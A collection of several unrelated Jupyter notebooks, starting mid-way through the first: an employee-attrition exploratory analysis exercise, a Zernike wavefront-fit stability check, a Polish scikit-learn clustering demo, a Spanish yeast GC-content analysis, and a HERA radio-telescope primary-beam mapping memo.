# # <br> # **First, display the <span style="color:royalblue">summary statistics</span> for categorical features in the dataset.** # + # Summarize categorical features # - # **Using a loop, display <span style="color:royalblue">bar plots</span> for each of the categorical features.** # + # Plot bar plot for each categorical feature # - # <div style="text-align:center; margin: 40px 0 40px 0; font-weight:bold"> # [Back to Contents](#toc) # </div> # <span id="segmentations"></span> # # 4. Segmentations # # Next, let's create some segmentations. Segmentations are powerful ways to cut the data to observe the relationship between categorical features and numeric features. # # The code is provided in this section as we didn't cover it in our lesson. If everything was done properly upto this point, you should be able to just execute the code below to display the charts. # # **First, display a <span style="color:royalblue">violin plot</span> with <code style="color:steelblue">'status'</code> on the y-axis and <code style="color:steelblue">'satisfaction'</code> on the x-axis.** # Segment satisfaction by status and plot distributions sns.violinplot(y="status", x="satisfaction", data=df) # **Next, display a violin plot that segments <code style="color:steelblue">'last_evaluation'</code> by <code style="color:steelblue">'status'</code>.** # Segment last_evaluation by status and plot distributions sns.violinplot(y="status", x="last_evaluation", data=df) # **<span style="color:royalblue">Group by</span> <code style="color:steelblue">'status'</code> and calculate the average value of each feature within each class.** # Segment by status and display the means within each class df.groupby('status').mean() # <div style="text-align:center; margin: 40px 0 40px 0; font-weight:bold"> # [Back to Contents](#toc) # </div> # <span id="advanced-segmentations"></span> # # 5. 
Advanced segmentations # # Because the target variable is categorical, it can often be helpful to expand your segmentation analysis. # # <br> # **Now, we'll see how to do bivariate segmentations, which can be produced with the <code style="color:steelblue">sns.lmplot()</code> function from the Seaborn library.** # * <code style="color:steelblue">sns.lmplot()</code> is essentially a regular **scatterplot** with additional options. # * For example, we can color each point based on its <code style="color:steelblue">'status'</code>. # * To do so, we'll use the <code style="color:steelblue">hue=</code> argument. # Scatterplot of satisfaction vs. last_evaluation sns.lmplot(y="satisfaction", x="last_evaluation", data=df, hue='status', fit_reg=None) # **Plot another scatterplot of <code style="color:steelblue">'satisfaction'</code> and <code style="color:steelblue">'last_evaluation'</code>, but only for employees who have <code style="color:crimson">'Left'</code>.** # * **Hint:** Do you still need the <code style="color:steelblue">hue=</code> argument? # * **Hint:** How might you change the <code style="color:steelblue">data=df</code> argument? # Scatterplot of satisfaction vs. last_evaluation, only those who have left sns.lmplot(y="satisfaction", x="last_evaluation", data=df[df.status == 'Left'], hue='status', fit_reg=None) # <div style="text-align:center; margin: 40px 0 40px 0; font-weight:bold"> # [Back to Contents](#toc) # </div> # <br> # # Congratulations for making through Exploratory Analysis! # # Before powering on, we recommend going back and reviewing the charts you made. This time, since you've already created them, you can move through more quickly and really start to understand the **story** behind the data. # # As a reminder, here are a few things you did in this module: # * You explored basic information about your dataset. # * You plotted distributions of numeric and categorical features. 
# * You segmented your dataset by <code style="color:steelblue">'status'</code>. # * And you dove into some advanced, bivariate segmentations. # # <div style="text-align:center; margin: 40px 0 40px 0; font-weight:bold"> # [Back to Contents](#toc) # </div>
Day_3/Student/Exercise 1 - Exploratory Analyis.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# +
import time
from datetime import datetime
import os
import sys
import numpy as np
import ipympl
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
from pathlib import Path
import astropy.units as u
from astropy import stats
from astropy.io import fits
from mmtwfs.wfs import *
from mmtwfs.zernike import ZernikeVector
from mmtwfs.telescope import MMT
# -

# %cd /Users/tim/MMT/wfsdat/20180209

rootdir = Path(".")

# Sanity-check a single Zernike fit before the bulk loop.
# (Fixed: the original line had a stray trailing "q" — a SyntaxError.)
z = ZernikeVector()

z.load("wfs_ff_cal_img_2018.0209.033646.zernike")

# Rebuild the same coefficients with a different starting mode to compare RMS
zz = ZernikeVector(modestart=23, **z.coeffs)

zz.rms, z.rms

files = sorted(rootdir.glob("wfs_*.fits"))

# Collect one single-row dataframe per observation, for both the raw and the
# normalized Zernike coefficients, tagged with the timestamp parsed from the
# filename.
dataframes = []
norm_dataframes = []
for f in files:
    full_zern = str(f.stem) + ".zernike"
    dtime = datetime.strptime(f.stem, "wfs_ff_cal_img_%Y.%m%d.%H%M%S")
    if Path(full_zern).exists():
        zv = ZernikeVector()
        zv.load(full_zern)
        norm_zv = zv.copy()
        norm_zv.normalize()
        df_zv = pd.DataFrame(zv.coeffs, index=[1])
        df_norm = pd.DataFrame(norm_zv.coeffs, index=[1])
        df_zv['time'] = dtime
        df_norm['time'] = dtime
        df_zv['rms'] = zv.rms
        df_norm['rms'] = norm_zv.rms
        dataframes.append(df_zv)
        norm_dataframes.append(df_norm)

# +
zdf = pd.concat(dataframes)
zdf_norm = pd.concat(norm_dataframes)

# create a date-time index so we can group and analyze the data by timestamps
zdf = zdf.set_index(pd.DatetimeIndex(zdf['time'], name='ut'))
zdf_norm = zdf_norm.set_index(pd.DatetimeIndex(zdf_norm['time'], name='ut'))

# drop clearly bad fits (RMS >= 500) before plotting
zdf_trim = zdf[zdf['rms'] < 500.]
# -

plt.close('all')
zdf_trim.plot(y='Z05')
plt.show()
notebooks/model stability.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ## Wprowadzenie # Skrypt pokazuje jak użyć pakietu SciKit do grupowania danych. Rozważane są dwa przykłady: dwuwymiarowe dane wygenerowane losowo z mieszaniny rozkładów gaussowskich oraz dane IRIS. # + % matplotlib inline import numpy as np import matplotlib.pyplot as plt import pandas as pd import sklearn.metrics as metrics import pprint from sklearn.cluster import KMeans, MiniBatchKMeans, Birch, DBSCAN # + from clustering_indexex import (davies_bouldin_index, dunn_index) def plotClustering(X, plt_labels, features=(0,1), ax=plt): if features[0] == features[1]: ax.hist( X[:, features[0]], edgecolor='black' ) else: ax.scatter( X[:,features[0]], X[:,features[1]], c=plt_labels, edgecolor='black' ) def positive_labels(labels): if np.any(labels < 0): return labels + np.abs(np.min(labels)) return labels def count_metrics(X, labels, centroids=None): pprint.pprint({ 'Silhouette': metrics.silhouette_score(X, labels, metric='euclidean'), 'dunn_index': dunn_index(X, labels, centroids), 'davies_bouldin_index': davies_bouldin_index(X, labels, centroids) }) # - # ## 1. Pierwszy zestaw danych # Dwuwymiarowe dane wygenerowane losowo z mieszaniny rozkładów gaussowskich # + from sklearn import datasets centers_ = [[1, 1], [3, 3], [5, 1]] X, labels = datasets.make_blobs( n_samples=3000, n_features=2, centers=centers_, cluster_std=0.5 ) plotClustering(X, labels) # - # ### Grupowanie za pomocą KMeans # sma # n-init: Number of time the k-means algorithm will be run with different centroid # seeds. The final results will be the best output of n_init consecutive # runs in terms of inertia. 
fig, axes = plt.subplots(1,3) fig.set_size_inches(12,4) for ax, n_init in zip(axes, [1,5,20]): k_means = KMeans( init='k-means++', n_clusters=3, n_init=n_init ) k_means.fit(X) plotClustering(X, k_means.labels_, ax=ax) ax.set_title(f'n_init: {n_init}') count_metrics(X, k_means.labels_, k_means.cluster_centers_) # ### Grupowanie za pomocą MiniBatchKMeans # #### mini_batch_k_means = MiniBatchKMeans(init='k-means++', n_clusters=3, batch_size=100, n_init=1, max_no_improvement=10, verbose=0, random_state=0) # mini_batch_k_means.fit(X) # # plotClustering(X, mini_batch_k_means.labels_) # count_metrics(X, mini_batch_k_means.labels_, mini_batch_k_means.cluster_centers_) # ### Grupowanie za pomocą Birch bez wtórnego grupowania # + # threshold [float, default 0.5]: # The radius of the subcluster obtained by # merging a new sample and the closest subcluster should be lesser than the threshold. # Otherwise a new subcluster is started. # Setting this value to be very low promotes splitting and vice-versa. 
fig, axes = plt.subplots(1,4) fig.set_size_inches(16,4) for ax, threshold in zip(axes, [0.45, 0.5, 0.75, 0.9]): birch = Birch(threshold=threshold, n_clusters=None) birch.fit(X) plotClustering(X, birch.labels_, ax=ax) centers = birch.root_.centroids_ ax.scatter(centers[:, 0], centers[:, 1], c='r') ax.set_title(f'Treshold: {threshold}') count_metrics(X, birch.labels_, birch.subcluster_centers_) # + birch = Birch(threshold=0.25, n_clusters=None) birch.fit(X) plotClustering(X, birch.labels_) centers = birch.root_.centroids_ print(centers.shape) plt.scatter(centers[:, 0], centers[:, 1], c='r') plt.suptitle('root centers') plt.show() # plt.set_title(f'Birch treshold: 0.25') plotClustering(X, birch.labels_) centers = birch.subcluster_centers_ plt.scatter(centers[:, 0], centers[:, 1], c='r') plt.suptitle('subcluster_centers_') plt.show() # - # ### Grupowanie za pomocą Birch z wtórnym grupowaniem # + birch = Birch(threshold=0.75, n_clusters=3) birch.fit(X) plotClustering(X, birch.labels_) count_metrics(X, birch.labels_, birch.root_.centroids_) # - # ### Grupowanie za pomocą DBScan # + # eps [float, optional] # The maximum distance between two samples for them to be considered as # in the same neighborhood. fig, axes = plt.subplots(1,5) fig.set_size_inches(20,4) for ax, eps in zip(axes, [0.1, 0.2, 0.3, 0.4, 0.5]): dbscan = DBSCAN(eps=eps, min_samples=25) dbscan.fit(X) plotClustering(X, dbscan.labels_, ax=ax) ax.set_title(f'eps: {eps}') ax.scatter( X[dbscan.labels_ == -1][:,0], X[dbscan.labels_ == -1][:,1], c='red' ) labels = positive_labels(dbscan.labels_) centers = np.empty((X.shape[1],np.unique(labels).size)) for i in range(np.unique(labels).shape[0] -1): l = X.T[:,labels == i] centers[:,i] = np.sum(l, axis=1)/l.shape[1] count_metrics(X, labels, centers.T) # - # ## 2. 
Drugi zestaw danych # Dane IRIS from sklearn import datasets iris = datasets.load_iris() X = iris.data # + k_means = KMeans(init='k-means++', n_clusters=3, n_init=1) k_means.fit(X) fig, axes = plt.subplots(X.shape[-1], X.shape[-1]) fig.set_size_inches(12,12) for i in range(X.shape[-1]): for j in range(X.shape[-1]): plotClustering(X, k_means.labels_, features=(i,j), ax=axes[i][j]) for i in range(X.shape[-1]): axes[X.shape[-1] - 1][i].set_xlabel(iris.feature_names[i]) axes[i][0].set_ylabel(iris.feature_names[i]) # - birch = Birch(threshold=0.75, n_clusters=3) birch.fit(X) fig, axes = plt.subplots(X.shape[-1], X.shape[-1]) fig.set_size_inches(12,12) for i in range(X.shape[-1]): for j in range(X.shape[-1]): plotClustering(X, birch.labels_, features=(i,j), ax=axes[i][j]) for i in range(X.shape[-1]): axes[X.shape[-1] - 1][i].set_xlabel(iris.feature_names[i]) axes[i][0].set_ylabel(iris.feature_names[i]) # + dbscan = DBSCAN(eps=0.5, min_samples=5) dbscan.fit(X) fig, axes = plt.subplots(X.shape[-1], X.shape[-1]) fig.set_size_inches(12,12) for i in range(X.shape[-1]): for j in range(X.shape[-1]): plotClustering(X, dbscan.labels_, features=(i,j), ax=axes[i][j]) for i in range(X.shape[-1]): axes[X.shape[-1] - 1][i].set_xlabel(iris.feature_names[i]) axes[i][0].set_ylabel(iris.feature_names[i]) # - # for t in [ # k_means, # birch, # dbscan # ]: # count_metrics(X, t.labels_) labels_db = positive_labels(dbscan.labels_) centers_db = np.empty((X.shape[1], np.unique(labels_db).size)).T for i in range(np.unique(labels_db).size): l = X[labels_db == i, :] centers_db[i, :] = l.mean(axis=0) count_metrics(X, k_means.labels_, k_means.cluster_centers_) count_metrics(X, birch.labels_, birch.root_.centroids_) count_metrics(X, labels_db, centers_db) X = np.arange(10) plt.scatter(X,X,c=X, cmap='tab10')
data_mining/04List/0_1_SciKit_Clustering_Demo.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Avances: Análisis descriptivo de datos import numpy as np import math import pandas as pd import seaborn as sns from datetime import datetime from matplotlib import pyplot as plt # %matplotlib inline plt.rcParams['figure.figsize']=20,14 import warnings warnings.filterwarnings('ignore') df_tot=pd.read_csv('base_anal_descr.csv') df_lev=pd.read_csv('base_levadura_anal_descr.csv') df1=pd.read_csv('baseLevadura_crom_I.csv') df2=pd.read_csv('baseLevadura_crom_II.csv') df3=pd.read_csv('baseLevadura_crom_III.csv') df4=pd.read_csv('baseLevadura_crom_IV.csv') df5=pd.read_csv('baseLevadura_crom_V.csv') df6=pd.read_csv('baseLevadura_crom_VI.csv') df7=pd.read_csv('baseLevadura_crom_VII.csv') df8=pd.read_csv('baseLevadura_crom_VIII.csv') df9=pd.read_csv('baseLevadura_crom_IX.csv') df10=pd.read_csv('baseLevadura_crom_X.csv') df11=pd.read_csv('baseLevadura_crom_XI.csv') df12=pd.read_csv('baseLevadura_crom_XII.csv') df13=pd.read_csv('baseLevadura_crom_XIII.csv') df14=pd.read_csv('baseLevadura_crom_XIV.csv') df15=pd.read_csv('baseLevadura_crom_XV.csv') df16=pd.read_csv('baseLevadura_crom_XVI.csv') var='GC_content' var2='dry' # ## Comparación de distribuciones - GC_content sns.set_style("darkgrid") f, axes = plt.subplots(2,2, figsize=(10,10)) vis_1=sns.distplot(df_tot[var], bins=50, ax=axes[0,0]) vis_2=sns.distplot(df_lev[var], bins=50, ax=axes[0,1]) vis_3=sns.distplot(df1[var], bins=50, ax=axes[1,0]) vis_4=sns.distplot(df6[var], bins=50, ax=axes[1,1]) # ## Comparación de la varianza intracromosómica en 5 secciones f, axes = plt.subplots(1,2, figsize=(15,5)) z1 = sns.violinplot(data=df1, x='section', y=var, ax=axes[0]) z2 = sns.violinplot(data=df6, x='section', y=var, ax=axes[1]) # ## Histogramas de abundancias de cada subsección dentro de una misma sección. 
f, axes = plt.subplots(1,5, figsize=(15,5)) lista1=[df1[(df1.section==1) & (df1.subsection==1.0)][var], df1[(df1.section==1) & (df1.subsection==2.0)][var], df1[(df1.section==1) & (df1.subsection==3.0)][var], df1[(df1.section==1) & (df1.subsection==4.0)][var], df1[(df1.section==1) & (df1.subsection==5.0)][var]] lista2=[df1[(df1.section==2) & (df1.subsection==1.0)][var], df1[(df1.section==2) & (df1.subsection==2.0)][var], df1[(df1.section==2) & (df1.subsection==3.0)][var], df1[(df1.section==2) & (df1.subsection==4.0)][var], df1[(df1.section==2) & (df1.subsection==5.0)][var]] lista3=[df1[(df1.section==3) & (df1.subsection==1.0)][var], df1[(df1.section==3) & (df1.subsection==2.0)][var], df1[(df1.section==3) & (df1.subsection==3.0)][var], df1[(df1.section==3) & (df1.subsection==4.0)][var], df1[(df1.section==3) & (df1.subsection==5.0)][var]] lista4=[df1[(df1.section==4) & (df1.subsection==1.0)][var], df1[(df1.section==4) & (df1.subsection==2.0)][var], df1[(df1.section==4) & (df1.subsection==3.0)][var], df1[(df1.section==4) & (df1.subsection==4.0)][var], df1[(df1.section==4) & (df1.subsection==5.0)][var]] lista5=[df1[(df1.section==5) & (df1.subsection==1.0)][var], df1[(df1.section==5) & (df1.subsection==2.0)][var], df1[(df1.section==5) & (df1.subsection==3.0)][var], df1[(df1.section==5) & (df1.subsection==4.0)][var], df1[(df1.section==5) & (df1.subsection==5.0)][var]] axes[0].hist(lista1, bins=20, stacked=True, rwidth = 1, label = df1['subsection'].unique()) axes[1].hist(lista1, bins=20, stacked=True, rwidth = 1, label = df1['subsection'].unique()) axes[2].hist(lista1, bins=20, stacked=True, rwidth = 1, label = df1['subsection'].unique()) axes[3].hist(lista1, bins=20, stacked=True, rwidth = 1, label = df1['subsection'].unique()) axes[4].hist(lista1, bins=20, stacked=True, rwidth = 1, label = df1['subsection'].unique()) plt.legend() plt.show() f, axes = plt.subplots(1,2, figsize=(15,5)) k1 = sns.kdeplot(df1[df1.section==1][var], df1[df1.section==1][var2], shade=True, 
shade_lowest=False, cmap='Reds', ax=axes[0]) k1bis = sns.kdeplot(df1[df1.section==1][var], df1[df1.section==1][var2], cmap='Reds', ax=axes[0]) k2 = sns.kdeplot(df6[df6.section==1][var], df6[df6.section==1][var2], shade=True, shade_lowest=False, cmap='Reds', ax=axes[1]) k2bis = sns.kdeplot(df6[df6.section==1][var], df6[df6.section==1][var2], cmap='Reds', ax=axes[1])
anal_descr_script.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # # ASU HERA Memo: Mapping HERA's Primary Beam # ### <NAME> # One of the challenges of observing highly redshifted 21 cm emission is separating the signal from bright foreground sources. Simulations have found that when these bright foreground sources are far from HERA's center, their flux is significantly reduced due to beam attenuation and they become difficult to separate from the 21 cm signal. Knowledge of the shape of the beam at different frequencies will allow for precise calibration of the array, which will help to isolate the 21 cm cosmological signal from bright foregrounds. The goal of this notebook is to observe HERA # s beam response at different frequency ranges by using IDR2.1 data to observe foreground point sources as they drift across the beam. # # ## 1. Imaging IDR2.1 Data # # To map HERA's primary beam by tracking sources as they move across the beam, we need to image a set of HERA data that is sensitive enough to that we can accurately measure of flux of sources as they move across the beam. The data set that we have decided to image to make this measurement is the [IDR2.1 data release](http://reionization.org/wp-content/uploads/2013/03/HERA_Memo45_IDR2.1.html). H1C IDR 2.1 contains pre-calibrated, LST-binned data from observations made from 18 nearly-consecutive nights of data. Since this data has been binned over many days of observation, it should provide the sensitivity needed to accurately measure the flux of the sources we will choose to track across the beam. # # One change that needed to be made to this data before making beam measurements from the images was splitting each data file from one 20 minute time integration into 10 two-minute time integrations. 
The reason for doing this was to create more images with less time passage between subsequent images, thus creating a smoother beam measurement for each source. Splitting the images into two-minute time integrations does reduce the sensitivity of the measurements but they should still allow us to make accurate beam measurements. We use pyuvdata to split these files in two-minute time integrations. # # Once we've created a set of two-minute time integration data, we image by using CASA to flag all of the autocorrelations and run the CLEAN command below on all two time integrations: # # ``` # clean(niter = 6000, weighting = 'briggs', robust = '-0.5', # imsize = [512,512], cell = ['250arcsec'], mode = 'mfs', nterms = 1) # ``` # We also image the data in bandwidths of 10 MHz (110-120 MHz, 120-130 MHz, ...) and 20 MHz (110-130 MHz, 130-150 MHz, ...), so that we can measure the beam response at different frequencies. This is done by changing the spectral window in the CLEAN command: # # ``` # # # Example CLEAN command for imaging data using 180-190 MHz frequencies # # clean(niter = 6000, weighting = 'briggs', robust = '-0.5', imsize = [512,512], # cell = ['250arcsec'], mode = 'mfs', nterms = 1, spw = '0:819~912') # # # ``` # # Now that we've imaged all of the time split IDR2.1 data at different frequency ranges, we use these images to make beam measurements of sources as they track across the beam. # ## 2. Tracking Foreground Sources # With the images generated for each set of frequencies, we can start tracking bright foreground sources as they drift across the beam. To find these sources, the [HERA_calibration_sources](https://github.com/dannyjacobs/asu_hera/tree/master/HERA_calibration_sources) code is used. This package uses the TGSS ADR catalogue to find radio sources within a right ascension and declination range and some minimum flux. 
# Once the desired values are entered, the name of the source, its right ascension, declination, and total flux are returned in a pandas dataframe.
#
# Using this package, we can isolate bright sources within a narrow declination range over the entire right ascension range that was observed in IDR 2.1. We keep the declination range narrow so that the final observed beam map can be compared to a cut from the beam model centered at HERA's zenith declination.

# +
from glob import glob
import numpy as np
import matplotlib.pyplot as plt
from astropy.io import fits
from astropy import units as u
from astropy.wcs import WCS
from HERA_calibration_sources import add_fluxes
from pyuvdata import UVBeam
import healpy as hp

import warnings
from astropy.utils.exceptions import AstropyWarning
warnings.simplefilter('ignore', category=AstropyWarning)

plt.rc('font', family='serif')
plt.rc('xtick', labelsize='small')
plt.rc('ytick', labelsize='small')
# -

tb = add_fluxes(RA_range=('00:00:00','13:00:00'),dec_range=1, min_flux=6)
tb

# The function below is where we track the flux sources found in the HERA_calibration_sources code as they move across the beam. For each image, the function loops through the list of sources to find the flux of the source if it exists in the image. We find whether or not the source is in the image by converting the source's right ascension and declination into a pixel value using astropy. The flux found at this pixel value is then divided by its true total flux, taken from the TGSS ADR catalog, to obtain a beam measurement at a particular angle from HERA's zenith. These values are then plotted as a function of angle from the telescope's zenith and compared to the beam model.

def track_sources(fits_files, sources, pos_buffer = 3):
    '''
    Creates a beam measurement for each source by measuring their flux in
    fits images generated from HERA data and dividing by their true total
    flux.

    Parameters
    ----------
    fits_files : array-like
        Fits files generated from the imaging pipeline to take flux
        measurements from
    sources : pandas.DataFrame
        Table of sources (one row per source, with 'Name of Center', 'RA',
        'Dec' and 'Total flux in region' columns) produced by
        HERA_calibration_sources. Used to track sources to make beam
        measurements
    pos_buffer : int, optional
        Half-width (in pixels) of the search box around the catalog position
        in which the peak flux is taken; also the margin kept from the image
        edges

    Returns
    -------
    plot_data : dict
        Dictionary containing the zenith angle and corresponding beam
        measurement for each source. The key is the source name.
    '''
    # One entry per catalog source.
    # BUG FIX: this previously iterated over the *global* `tb` instead of the
    # `sources` argument, so passing a different source table had no effect
    # on which sources were tracked.
    plot_data = {v['Name of Center']: {'RA_diff': [], 'Flux': []}
                 for _, v in sources.iterrows()}
    for f in fits_files:
        with fits.open(f) as HDU:
            # Read in file information
            fits_info = HDU[0].header
            ax1 = fits_info['NAXIS1']
            ax2 = fits_info['NAXIS2']
            c_ra = fits_info['OBSRA']
            c_dec = fits_info['OBSDEC']
            pix_size = abs(fits_info['CDELT1'])
            # Flip the data to correct the axes
            data = HDU[0].data
            data = np.flip(data[0][0], axis=0)
            w = WCS(f)
            for _, src in sources.iterrows():
                # Convert a sky position to pixel values
                idx_1, idx_2 = w.all_world2pix(src['RA'], src['Dec'], 0, 0, 0)[:2]
                if not np.isnan(idx_1) and not np.isnan(idx_2):
                    idx_1 = int(idx_1)
                    idx_2 = int(ax2 - idx_2)  # rows were flipped above
                    # ax1 is the right-most pixel, ax2 is the bottom-most pixel;
                    # we want to make sure that both values are within the
                    # correct range (with room for the search box)
                    if (pos_buffer < idx_1 < ax1 - pos_buffer) and (pos_buffer < idx_2 < ax2 - pos_buffer):
                        # Peak absolute flux in a small box around the catalog
                        # position, normalized by the catalog total flux.
                        max_flux = np.abs(data[idx_2 - pos_buffer:idx_2 + pos_buffer, idx_1 - pos_buffer:idx_1 + pos_buffer]).max()
                        plot_data[src['Name of Center']]['Flux'].append(max_flux / src['Total flux in region'])
                        ra_diff = c_ra - src['RA']
                        # Correct for the difference in c_ra error
                        # (unwrap RA differences across the 0/360 deg boundary)
                        if ra_diff > pix_size * ax1:
                            ra_diff -= 360
                        if ra_diff < -pix_size * ax1:
                            ra_diff += 360
                        plot_data[src['Name of Center']]['RA_diff'].append(ra_diff)
    return plot_data

# With the function below, we combine the beam measurements made from the functions above into a single beam measurement.
# This is done by gridding the measurements by zenith angle and averaging overlapping measurements made at each angle.

def observed_beam(cleaned_set):
    '''
    Creates a single beam cut from beam measurements made for each source.

    Parameters
    ----------
    cleaned_set : dict
        Dictionary mapping source name -> {'RA_diff': [...], 'Flux': [...]},
        i.e. normalized flux values and their corresponding angles from
        zenith for each source, as returned by the track_sources function.

    Returns
    -------
    bins : array-like
        Zenith angles (bin edges/centers) for the final beam measurement
    obs_beam : array-like
        Single beam measurement (in dB, peak-normalized) compiled from the
        individual source measurements
    beam_std : array-like
        Standard deviation (in dB) of the measurements falling in each
        zenith-angle bin (NaN for bins that received no measurements)
    '''
    n = 0
    x = []
    y = []
    min_x = 30
    max_x = -30
    # Collect every source's angle/flux track and find the common angular
    # extent and the largest track length (used as the number of bins).
    # BUG FIX: this previously iterated over the *global* `plot_data` (via
    # the Python-2-only dict.iteritems()), silently ignoring the
    # `cleaned_set` argument -- which broke callers that pass a filtered
    # set of sources.
    for _, src in cleaned_set.items():
        x.append(src['RA_diff'])
        flux = np.array(src['Flux'])
        y.append(flux)
        if len(src['Flux']) > 0:
            if len(src['Flux']) > n:
                n = len(src['Flux'])
            if min(src['RA_diff']) < min_x:
                min_x = min(src['RA_diff'])
            if max(src['RA_diff']) > max_x:
                max_x = max(src['RA_diff'])

    bins = np.linspace(min_x, max_x, n)
    vals = np.zeros(n)
    # Counts start at one (not zero) to guard against division by zero in
    # empty bins; note this slightly biases the per-bin average downward.
    counts = np.ones(n)
    std_arr = [[] for _ in range(n)]
    for i, d in enumerate(x):
        idx = np.digitize(d, bins) - 1
        # BUG FIX: np.add.at accumulates correctly even when several
        # measurements of the same source fall into the same bin; the
        # previous fancy-indexed `+=` counted repeated indices only once.
        np.add.at(vals, idx, y[i])
        np.add.at(counts, idx, 1)
        for m, b in enumerate(idx):  # renamed from `n`, which shadowed the bin count
            std_arr[b].append(y[i][m])

    obs_beam = vals / counts
    obs_beam /= obs_beam.max()
    obs_beam = 10 * np.log10(obs_beam)
    # Per-bin scatter in dB space.
    beam_std = np.array([np.std(10 * np.log10(std)) for std in std_arr])
    return bins, obs_beam, beam_std

# Using the two functions above with the source finding code, we can create a single beam measurement. We use images generated using the frequencies 110-130 MHz to make our first beam measurement. If this is done correctly, we hope to see a beam measurement that appears to be roughly gaussian looking at the zenith angles we will be measuring out to.
# +
# Measure the beam from the 110-130 MHz images.
freq_range = '110-130MHz'
freq_ends = [110,130]

files = np.sort(glob('/data6/HERA/HERA_imaging/IDR2/'+freq_range+'/imgs/*fits'))
plot_data = track_sources(files,tb)
theta, obs_beam, obs_std = observed_beam(plot_data)

# +
# Individual per-source beam tracks (in dB).
plt.figure(figsize=(15,8))
for key,item in plot_data.items():
    flux = np.array(item['Flux'])
    plt.plot(item['RA_diff'],10*np.log10(flux),label=key)
plt.xlabel(r'Beam Angle $(^\circ)$')
plt.ylabel(r'Amplitude (dBi)')
plt.legend()
plt.grid()
plt.show()
# -

# Combined beam measurement with the per-bin scatter as error bars; the
# outermost bins are dropped because they are sampled by few measurements.
plt.figure(figsize=(12,7))
plt.xlabel(r'Beam Angle $(^\circ)$')
plt.ylabel('Amplitude (dB)')
# BUG FIX: the title previously ended with a dangling ': ' -- append the
# frequency range, matching the titles of the comparison plots below.
plt.title('Measured Beam Sensitivity: ' + freq_range)
plt.errorbar(theta[4:-4], obs_beam[4:-4], yerr=obs_std[4:-4])
plt.grid()
plt.show()

# The beam measurement above looks roughly like what we were expecting. The real test will be comparing the beam measurement to a simulation of HERA's beam at these frequencies. We can now look into modeling HERA's beam at the range of frequencies used in this measurement, 110-130 MHz.

# ## 3. Modeling HERA's Beam

# To model HERA's beam, which we will use to compare to our beam measurement, we will use an electromagnetic simulation of HERA's antenna created by <NAME>. This simulation contains the beam response at every integer frequency that HERA is currently capable of observing. We'll start by importing this simulation using the UVBeam object in [pyuvdata](https://github.com/RadioAstronomySoftwareGroup/pyuvdata).

hera_beam = UVBeam() #Instantiating HERA's beam as a UVBeam object

hera_beam.read_beamfits("NF_HERA_power_beam_healpix.fits") #Reading in the beam model

# Now, we define a function to find HERA's beam at a specific frequency. We can use this function to find the shape of the beam over a range of frequencies by averaging beam models over a particular frequency range.
def hera_beam_freq_slice(hera_beam, freq, beam_center = 90, ang_from_center = 15, n = 100):
    '''
    Returns a cut through the simulated beam at a single frequency,
    peak-normalized and sampled at `n` angles around the beam center.

    Parameters
    ----------
    hera_beam : UVBeam
        HERA beam model simulation read into a UVBeam object
    freq: int
        Frequency (MHz) to pull from the simulation
    beam_center: float, optional
        Zenith declination, set to 90 degrees in the simulation
    ang_from_center: int
        Angle from zenith to map the simulated beam out to
    n: int
        Number of points in the plot

    Returns
    -------
    ang : array-like
        Angle from zenith for each point in the beam model
    beam_slice: array-like
        Beam model at the given frequency and angle range
    '''
    # Sample angles symmetrically about the beam center.
    ang = np.linspace(beam_center-ang_from_center,beam_center+ang_from_center,n)
    beam_slice = []
    # Index into the simulation's frequency axis.
    # NOTE(review): the "- 100" assumes the simulated frequency axis starts
    # at 100 MHz with 1 MHz spacing -- confirm against the beam FITS file.
    beam_map = hera_beam.data_array[0][0][0][freq-100]
    # Peak-normalize the HEALPix map before interpolating.
    beam_map_norm = beam_map/np.max(beam_map)
    for i in ang:
        # Interpolate the HEALPix map at longitude 0, latitude i (degrees).
        beam_slice.append(hp.get_interp_val(beam_map_norm,0, i, lonlat=True))
    return ang, np.array(beam_slice)

# To make sure that this function works, we can plot a few beam models to see they look similar to the plots made in [beam simulation memo](https://github.com/Nicolas-Fagnoni/Simulations/blob/master/Memo/Memo%20-%20CST%20simulation%20of%20HERA%20and%20comparison%20with%20measurements.pdf).

# +
# Plot single-frequency beam model cuts (in dB) at several frequencies.
freqs = np.array([100,120,140,160,180,200])
model_beam = np.zeros(100)

fig, axs = plt.subplots(2,3, figsize=(15, 8), facecolor='w', edgecolor='k',sharex='col')
fig.subplots_adjust(hspace = .3)
axs = axs.ravel()

for i,freq in enumerate(freqs):
    ang, beam = hera_beam_freq_slice(hera_beam, freq, ang_from_center=45, n=100)
    model_beam = 10*np.log10(beam)
    axs[i].plot(ang-90,model_beam,'k--')
    axs[i].set_title('Beam Model: ' + str(freq) + ' MHz')
    axs[i].grid()
    # Only label the outer axes of the 2x3 grid.
    if i > 2:
        axs[i].set_xlabel('Beam Angle $(^\circ)$')
    if i == 0 or i == 3:
        axs[i].set_ylabel('Amplitude (dBi)')
plt.show()
# -

# We can also plot a model averaged over a frequency range against models at a single frequency to make sure the averaged model is consistent with the single frequency models.
# +
# Average the single-frequency models over 110-130 MHz (in linear space,
# then convert to dB); plot every 5th single-frequency model for reference.
freqs = np.arange(110,130)
model_beam = np.zeros(200)

plt.figure(figsize=(15,8))
for freq in freqs:
    ang, beam = hera_beam_freq_slice(hera_beam, freq, ang_from_center=90, n=200)
    model_beam += beam
    if freq%5 == 0:
        plt.plot(ang-90,10*np.log10(beam),label=(str(freq) + ' MHz'))
model_beam /= freqs.shape[0]
model_beam = 10*np.log10(model_beam)

plt.xlabel(r'Beam Angle $(^\circ)$')
plt.ylabel(r'Amplitude (dBi)')
plt.title(r'Beam Model: 110-130 MHz')
plt.plot(ang-90,model_beam,'k--', label = '110-130 MHz')
plt.grid()
plt.legend()
plt.show()
# -

# ## 4. Comparing the Beam Measurement and the Model

